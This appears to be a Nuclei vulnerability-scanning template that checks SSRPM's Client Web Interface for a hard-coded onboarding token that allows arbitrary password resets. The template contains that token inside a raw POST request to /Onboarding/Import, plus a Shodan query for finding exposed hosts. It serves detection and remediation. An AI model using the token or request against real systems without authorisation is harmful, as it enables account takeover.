id: ssrpm-arbitrary-password-reset

info:
  name: SSRPM - Arbitary Password Reset on Default Client Interface Installation
  author: vince-isec
  severity: high
  description: |
    The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
  remediation: Set a new and random value to the OnboardingToken setting. Install the new version of SSRPM and its web interface.
  reference:
    - https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation
  metadata:
    shodan-query: http.favicon.hash:-916902413
    max-request: 1
    verified: true
  tags: ssrpm,intrusive

variables:
  string: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /Onboarding/Import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action={{string}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"ErrorCode":-55'
          - '"Success":false'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - string
# digest: 4a0a00473045022050149c259ebd2c53027582dbb9a79dd703cfcfb1ca9357feae23108fe913029e022100ed0ef223ee9d627a4e6d68b56000280be279df21d258df4e07cf298191866c99:922c64590222798bb761d5b6d8e72950